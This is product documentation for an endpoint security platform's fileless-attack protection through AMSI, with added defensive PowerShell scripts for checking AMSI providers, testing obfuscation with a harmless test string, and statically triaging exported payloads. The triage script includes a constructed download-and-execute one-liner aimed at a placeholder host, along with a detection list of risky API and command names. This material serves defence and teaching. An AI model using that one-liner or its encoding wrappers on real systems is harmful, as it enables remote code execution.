Fileless Protection

Attackers increasingly use sophisticated techniques to infiltrate systems through a range of script engines and programs, and many successful attacks rely on fileless malware. Because security vendors now closely monitor the most commonly abused native components, such as PowerShell and .NET, attackers are shifting toward other script engines and programs.

To address this shift, the Cybereason platform integrates the Microsoft Anti-Malware Scan Interface (AMSI) into its Fileless protection suite, alongside the existing PowerShell and .NET protection modules. AMSI is a Windows interface standard through which script engines and applications submit the content they are about to execute to any registered anti-malware product for scanning. Integrating Cybereason with AMSI provides visibility, collection, detection, and prevention for the engines and programs whose modern versions have built-in AMSI support.

Fileless protection is supported on Windows machines. For details, see Endpoint machine prevention features.
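Because AMSI only protects what is registered with it, the first check a practitioner wants is which providers the endpoint actually has. The following PowerShell script is an added example and not Cybereason's code: it reads the AMSI provider registrations from the registry, resolves each CLSID through its COM registration, and reports the implementing DLL and its Authenticode signer. It assumes Windows 10 or Server 2016 or later and an elevated prompt.

```powershell
# Added example (not Cybereason's code): list the anti-malware providers
# registered with AMSI on this endpoint. Every AMSI-aware script host
# (PowerShell, WSH, VBA, WMI) hands the content it is about to run to each
# provider listed here, so this is the quickest way to confirm that the sensor
# you expect is actually wired into the scan path. Windows 10 / Server 2016 or
# later; run from an elevated PowerShell prompt.

function Get-AmsiProvider {
    [CmdletBinding()]
    param()

    $providersKey = 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers'
    if (-not (Test-Path -Path $providersKey)) {
        Write-Warning 'No AMSI Providers key: no anti-malware product is registered with AMSI.'
        return
    }

    foreach ($key in Get-ChildItem -Path $providersKey) {
        # Each subkey name is the COM CLSID of a provider; resolve it through the
        # normal COM registration to get its friendly name and implementing DLL.
        $clsid   = $key.PSChildName
        $comKey  = "HKLM:\SOFTWARE\Classes\CLSID\$clsid"
        $name    = (Get-ItemProperty -Path $comKey -ErrorAction SilentlyContinue).'(default)'
        $rawDll  = (Get-ItemProperty -Path "$comKey\InprocServer32" -ErrorAction SilentlyContinue).'(default)'

        # InprocServer32 is often REG_EXPAND_SZ (%ProgramFiles%\...), so expand before testing.
        $dllPath = if ($rawDll) { [Environment]::ExpandEnvironmentVariables($rawDll).Trim('"') } else { $null }
        $present = [bool]($dllPath -and (Test-Path -Path $dllPath))
        $sig     = if ($present) { Get-AuthenticodeSignature -FilePath $dllPath } else { $null }

        [pscustomobject]@{
            Clsid      = $clsid
            Name       = $name
            Dll        = $dllPath
            DllPresent = $present
            # The signer tells you whose code is loaded into every script host via AMSI.
            Signer     = if ($sig) { $sig.SignerCertificate.Subject } else { $null }
            SigStatus  = if ($sig) { $sig.Status } else { $null }
        }
    }
}

Get-AmsiProvider | Format-Table -AutoSize
```

A provider whose DLL is missing or whose signature status is not Valid is a finding in itself: script hosts will call into it, but the vendor's scanning is not reliably in the path. Run the check after deploying or upgrading the sensor, and again if Fileless protection MalOps stop appearing for hosts you know are generating scripted activity.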

[Video: Fileless attack prevention]

Protected frameworks and programs

The Cybereason platform’s Fileless protection suite provides coverage for attacks launched by a number of frameworks and programs.

In addition, the Cybereason platform lets you choose which Fileless protection modules to enable, so you can select the type of protection suitable for your organization: AMSI, .NET, or both modules for full protection. Both modules include PowerShell protection. For more information about the Fileless protection modules, see Select the Fileless protection module.

The following list shows the protected frameworks and programs, and which module includes protection for each.

PowerShell (module: AMSI, .NET)
Attackers use the legitimate PowerShell engine to launch advanced, fileless attacks. NGAV prevents malicious PowerShell commands before they can execute, even when an attacker has obfuscated the command.

.NET (module: .NET)
Attackers increasingly abuse the powerful .NET framework. Cybereason defends against malicious .NET techniques such as DotNetToJScript and floating .NET modules (assemblies loaded directly into memory rather than from a file on disk), and against tools such as SharpSploit, SILENTTRINITY, and Internal Monologue.

JScript and VBScript (module: AMSI)
Attackers use the native Windows scripting languages to implement sophisticated, multi-stage attacks. For example, a malicious document may open an HTML page containing VBScript code that triggers malicious shellcode. Obfuscation does not hide these stages: at some point the script must supply the scripting engine with plain, unobfuscated code, and NGAV scans and blocks that deobfuscated content through AMSI.

Office macros, including Excel 4.0 macros (module: AMSI)
Attackers use malicious VBA macros, and legacy Excel 4.0 macros, to launch attacks from Office documents. If NGAV detects specific Windows API calls that are considered high risk, it analyzes the macro and prevents it from executing if the macro is deemed malicious.

Windows Management Instrumentation (WMI) (module: AMSI)
Protects against attacks that abuse WMI, a set of Microsoft specifications for administering Windows systems. Attackers use WMI to interact with local and remote systems and to perform actions that assist discovery and lateral movement, such as gathering system information or executing files remotely.

Detecting fileless attacks

Attackers use a variety of modules, frameworks, and programs to launch advanced, fileless attacks. They can take control of a module, framework, or program in many ways, often without running its usual host process (for example, by loading a script engine into another process). In many cases a fileless attack never writes a payload to disk, so it can easily elude standard antivirus tools that only scan files.

NGAV prevents malicious commands before the commands can execute, even in cases where an attacker obfuscated the command. Where relevant, the malicious command or payload is displayed within the MalOp. For PowerShell attacks, see Malicious Command Malop for more information.
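The claim that obfuscation does not defeat this protection can be checked on any AMSI-enabled host. The following PowerShell script is an added example, not Cybereason's code: it pushes Microsoft's harmless AMSI test sample string through Invoke-Expression in plain, base64-encoded, concatenated, and character-code forms and records whether each variant is reported as blocked. Whether a variant is blocked depends on the installed AMSI provider recognizing the test sample (Windows Defender does); what the exercise demonstrates, for PowerShell and equally for the JScript, VBScript, and VBA engines, is that every wrapper has to hand the engine the decoded plaintext, and that plaintext is exactly what AMSI scans.

```powershell
# Added example (not Cybereason's code): shows why obfuscating a PowerShell
# command does not hide it from an AMSI-backed scanner. Every wrapper below must
# hand Invoke-Expression the plaintext string before it can run, and that
# plaintext is what AMSI scans. The payload is Microsoft's harmless AMSI test
# sample string; nothing malicious is executed.
#
# The sample is assembled from fragments so that this file's own text does not
# contain the full indicator. Otherwise AMSI would block the whole script at
# load time, which is itself a useful observation about how early scanning occurs.

$fragments = 'AMSI Test ', 'Sample: 7e72c3ce-861b-', '4339-8740-0ac1484c1386'
$sample    = -join $fragments

function Test-AmsiCatch {
    param(
        [Parameter(Mandatory)][string]$Technique,
        [Parameter(Mandatory)][scriptblock]$Action
    )
    try {
        & $Action | Out-Null
        [pscustomobject]@{ Technique = $Technique; Blocked = $false; Error = $null }
    } catch {
        # An AMSI block surfaces as a ParseException with this error id. Any other
        # error (typically CommandNotFoundException, because the sample is not a
        # real command) means the text reached the parser without being flagged.
        [pscustomobject]@{
            Technique = $Technique
            Blocked   = ($_.FullyQualifiedErrorId -like '*ScriptContainedMaliciousContent*')
            Error     = $_.FullyQualifiedErrorId
        }
    }
}

# Base64 of the UTF-16LE bytes, the same encoding powershell.exe -EncodedCommand uses.
$b64   = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($sample))
# Character-code array, rebuilt with [char] casts at run time.
$codes = [int[]][char[]]$sample

@(
    Test-AmsiCatch -Technique 'plain'    -Action { Invoke-Expression $sample }
    Test-AmsiCatch -Technique 'base64'   -Action {
        Invoke-Expression ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b64)))
    }
    Test-AmsiCatch -Technique 'concat'   -Action { Invoke-Expression (-join $fragments) }
    Test-AmsiCatch -Technique 'charcode' -Action {
        Invoke-Expression (-join ($codes | ForEach-Object { [char]$_ }))
    }
) | Format-Table -AutoSize
```

If every row reports Blocked = True, the scan path is working and the decoding layer bought the attacker nothing. If the rows report CommandNotFoundException instead, the engine parsed and tried to run the plaintext without any provider objecting, which is the condition to investigate on that host.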

Sensitivity level

Note

This feature is available from version 23.1.8x.

In version 23.1.8x and later, the Cybereason platform includes significant enhancements to the Fileless protection feature to provide better stability over time and to accommodate larger environments with numerous exclusions. The following enhancements are included:

  • You can set the .NET module Sensitivity level to Basic or Extended mode to tailor Fileless protection to your environment. Basic mode restricts protection to the processes with the most security value, such as PowerShell and PowerShell ISE; Extended mode protects all PowerShell and .NET applications.

  • You can exclude specific paths from Fileless protection, including with regular-expression wildcards, which gives you finer control over exclusions.

  • The detection and prevention mechanism is less invasive to the protected processes, which improves stability and reduces the risk of application crashes.

Fileless detection and prevention options

The Cybereason platform lets you control which types of fileless activity are detected and how they are handled.

You can instruct the Cybereason platform to both detect and prevent:

  • The use of certain commands and methods, such as Invoke-Expression and DownloadString

  • Malicious use of scripts

  • Floating .NET modules

Note

If you have legitimate processes that might trigger Fileless protection, you can also add exclusions so that Fileless protection does not block legitimate use of these frameworks.

See Set the Fileless Protection Modes to learn how to configure your Fileless protection.

Watch this video for more examples of Fileless protection by EDR and NGAV components.

Fileless detection descriptions

Note

This feature is available on demand in version 23.1.4x and generally available in version 23.1.83 and higher.

Fileless protection MalOps include descriptions for rule-based (pattern) Fileless detection events. Descriptions of the malicious behavior associated with the pattern help analysts better understand the context of the event.

You can view these descriptions in the MalOp details, in the Description area at the top left, and in the Investigation screen, in the properties section of the Detection event.

For example, notice the description provided for the Script_Obfuscation (325) event in the MalOp details screen:

[Image: Fileless Description]

Analyze payload

For Fileless protection MalOps in which the Cybereason platform has captured the payload that triggered the MalOp, analysts can view or download the payload content for analysis.

To analyze the payload:

  1. From the Malop Details screen, click the Process tab.

  2. Click the affected process to open the Process details screen.

  3. In the Detection Events section, click items in the Contents list.

  4. In the PowerShell section, hover over the payload drop down to view the payload on screen, or click Export to download the payload content in a text file for analysis.

Note

Handle payloads with care, as they contain malicious code. Inspect them with static tools in an isolated analysis environment and never execute them on a production machine.

See a full example here: Analyze Payload for Fileless MalOp Example
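Once the payload has been exported as a text file, the first question is what it does without running any of it. The following PowerShell script is an added example and not Cybereason's code: it peels off a -EncodedCommand style base64 layer if one is present, tokenizes the result with PowerShell's own parser (which builds a syntax tree and never executes), and lists the command names, .NET member calls, and URLs an analyst wants first, flagging the ones the page lists as risky such as Invoke-Expression and DownloadString. The sample payload, the list of risky names, and the -Path parameter are constructed for illustration; run it only in an isolated analysis VM, and it requires PowerShell 5 or later for the using statement.

```powershell
# Added example (not Cybereason's code): static triage of a PowerShell payload
# exported from a Fileless MalOp, without executing any of it. Decodes an
# -EncodedCommand style base64 layer if present, tokenizes the result with the
# PowerShell parser (AST only, no execution), and reports command names, .NET
# member calls and URLs, flagging names that Fileless protection treats as risky.
# Run only in an isolated analysis VM. The sample payload and the risky-name
# list below are constructed for illustration.

using namespace System.Management.Automation.Language

# Names worth flagging in a fileless payload (illustrative list; extend as needed).
$RiskyNames = @(
    'Invoke-Expression', 'iex', 'Invoke-Command', 'Add-Type', 'Start-Process',
    'DownloadString', 'DownloadFile', 'DownloadData', 'FromBase64String',
    'Load', 'VirtualAlloc', 'CreateThread', 'Bypass'
)

function Expand-Base64Layer {
    # A payload captured from "powershell -EncodedCommand <blob>" is one base64
    # string of UTF-16LE text; peel that layer so the parser sees the real code.
    param([Parameter(Mandatory)][string]$Text)
    $t = $Text -replace '\s', ''
    if ($t -match '^[A-Za-z0-9+/]+={0,2}$' -and $t.Length % 4 -eq 0) {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($t)) } catch { }
    }
    return $Text
}

function Get-PayloadTriage {
    param(
        [Parameter(Mandatory, ParameterSetName = 'Text')][string]$Text,
        [Parameter(Mandatory, ParameterSetName = 'File')][string]$Path
    )
    if ($Path) { $Text = Get-Content -Path $Path -Raw }

    $code   = Expand-Base64Layer -Text $Text
    $tokens = $null; $errors = $null
    # ParseInput only tokenizes and builds an AST; nothing in the payload runs.
    [Parser]::ParseInput($code, [ref]$tokens, [ref]$errors) | Out-Null

    $commands = @($tokens | Where-Object { ($_.TokenFlags -band [TokenFlags]::CommandName) -ne 0 } |
                  ForEach-Object Text | Sort-Object -Unique)
    $members  = @($tokens | Where-Object { ($_.TokenFlags -band [TokenFlags]::MemberName) -ne 0 } |
                  ForEach-Object Text | Sort-Object -Unique)
    # Use the unquoted value of string tokens so names hidden in strings still match.
    $allNames = @($tokens | ForEach-Object { if ($_ -is [StringToken]) { $_.Value } else { $_.Text } })
    $urls     = @([regex]::Matches($code, 'https?://[^\s''"`)]+') | ForEach-Object Value | Sort-Object -Unique)

    [pscustomobject]@{
        DecodedLayer = ($code -ne $Text)
        ParseErrors  = $errors.Count
        Commands     = $commands
        Members      = $members
        Urls         = $urls
        Risky        = @($allNames | Where-Object { $_ -in $RiskyNames } | Sort-Object -Unique)
        Decoded      = $code
    }
}

# Constructed sample: a download-and-execute one-liner wrapped as -EncodedCommand base64.
$inner  = "`$c = New-Object Net.WebClient; Invoke-Expression `$c.DownloadString('http://example.invalid/stage2.ps1')"
$sample = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($inner))

Get-PayloadTriage -Text $sample | Format-List
# For a real export: Get-PayloadTriage -Path 'C:\analysis\malop-payload.txt' | Format-List
```

The Decoded field gives you the plaintext the engine would have executed, which is the same view AMSI gets at the deobfuscation stage; the Urls and Risky fields are what to pivot on in the Investigation screen and in network telemetry. Payloads with several nested layers (compression, additional base64, string rebuilding) need the decoding repeated on the Decoded output, still without executing it.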